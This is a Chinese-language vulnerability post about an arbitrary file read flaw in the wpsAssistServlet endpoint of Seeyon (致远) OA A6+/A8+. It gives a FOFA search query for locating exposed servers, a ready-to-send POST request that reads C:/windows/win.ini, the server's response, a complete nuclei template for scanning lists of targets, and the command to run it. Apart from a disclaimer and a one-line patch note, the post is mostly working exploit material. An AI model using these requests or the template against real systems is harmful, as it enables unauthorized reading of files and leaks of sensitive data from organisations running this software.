致远OA wpsAssistServlet 任意文件读取漏洞

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

漏洞名称

致远OA wpsAssistServlet任意文件读取漏洞

漏洞影响

致远互联-OA  A6+企业版   A8+企业版

漏洞描述

2010年用友致远更名为致远协创；2017年更名为致远互联。用友致远协同管理软件精准定位于企事业组织行为管理的需求，融入先进的协同管理理念，运用领先的网络技术，是基于互联网的组织行为管理平台。用友致远协同管理软件为企事业组织提供了一个协同办公门户和管理平台，涵盖了组织运营涉及的协作管理、审批管理、资源管理、知识管理、文化管理、公文管理等内容，支持企事业组织的信息化扩展应用，能有效帮助组织解决战略落地、文化建设、管理规范、资源整合、运营管控等难题，是组织管理的最佳实践。用友致远有A6和A8两大协同软件产品线：A6协同管理软件以其成熟稳定、“易用、好用、适用”的产品特性被业界誉为“协同经典”。2007年底发布的A8协同管理软件，以强力支持集团化、多语言和跨平台应用为特点，被业界誉为“中国协同应用软件的新标准”。致远互联-OA wpsAssistServlet接口存在任意文件读取漏洞容易造成敏感信息泄露。

FOFA搜索语句

app="致远互联-OA" && title="V8.0SP2"

漏洞复现

向目标发送如下数据包

POST /seeyon/wpsAssistServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Content-Length: 44
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

flag=template&templateUrl=C:/windows/win.ini

响应数据包如下

HTTP/1.1 200 
Connection: close
Content-Length: 92
Content-Disposition: attachment; filename=win.ini
Content-Type: application/octet-stream;charset=UTF-8
Date: Tue, 31 Oct 2023 01:52:54 GMT
Server: SY8045

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

证明存在漏洞

nuclei poc

poc文件内容如下

id: seeyon-wpsAssistServlet-anyfileread
info:
  name: 致远OA wpsAssistServlet 任意文件读取漏洞
  author: fgz
  description: '用友致远有A6和A8两大协同软件产品线：A6协同管理软件以其成熟稳定、“易用、好用、适用”的产品特性被业界誉为“协同经典”。2007年底发布的A8协同管理软件，以强力支持集团化、多语言和跨平台应用为特点，被业界誉为“中国协同应用软件的新标准”。致远互联-OA wpsAssistServlet接口存在任意文件读取漏洞容易造成敏感信息泄露。'
  severity: high
  tags: fileread,2023
  metadata:
    fofa-qeury: app="致远互联-OA" && title="V8.0SP2"
    veified: true
    max-request: 3

http:
  - raw:
      - |
        POST /seeyon/wpsAssistServlet HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
        Accept: */*
        Connection: close
        Content-Type: application/x-www-form-urlencoded

        flag=template&templateUrl=C:/windows/win.ini

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'bit app support')"

运行POC

.\nuclei.exe -t mypoc/致远/seeyon-wpsAssistServlet-anyfileread.yaml -l 1.txt

修复建议

关注官方安全中心补丁。